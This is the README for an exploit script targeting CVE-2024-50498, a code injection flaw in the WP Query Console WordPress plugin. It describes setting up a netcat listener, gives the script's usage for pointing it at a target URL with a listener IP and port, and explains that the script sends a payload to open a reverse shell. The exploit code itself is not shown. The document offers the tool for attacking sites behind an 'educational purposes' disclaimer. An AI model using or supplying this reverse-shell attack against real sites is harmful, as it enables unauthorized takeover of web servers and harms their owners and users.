# CVE-2024-50498
## Description
Improper Control of Generation of Code ('Code Injection') vulnerability in LUBUS WP Query Console allows Code Injection.This issue affects WP Query Console: from n/a through 1.0.
## Setup Netcat Listener:
Open a terminal on your machine and start a Netcat listener to wait for the reverse shell connection
```
nc -lvnp <PORT>
```
### usage
```
usage: CVE-2024-50498.py [-h] -u URL -ip LISTENER_IP -P PORT
wordpress | Improper Control of Generation of Code ('Code Injection') vulnerability in LUBUS WP Query Console allows Code
Injection.This issue affects WP Query Console: from n/a through 1.0. script Exploit by: Nxploit Khaled_alenazi This script
is provided for educational purposes only. The author is not responsible for any damages caused by the misuse of this
script.
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL (e.g., http://example.com/wordpress)
-ip LISTENER_IP, --listener_ip LISTENER_IP
Your IP address for listening.
-P PORT, --port PORT Your listening port.
```
After running the command, monitor the Netcat terminal for the reverse shell connection.
### Output
The script will first check if the site is vulnerable by looking for the plugin version.
If vulnerable, it sends a payload to trigger the reverse shell.
If successful, check your Netcat terminal for the shell connection.
[4.0K] /data/pocs/976b95f36b2aeff92c06955acaf557849b40592f
├── [2.9K] CVE-2024-50498.py
└── [1.4K] README.md
0 directories, 2 files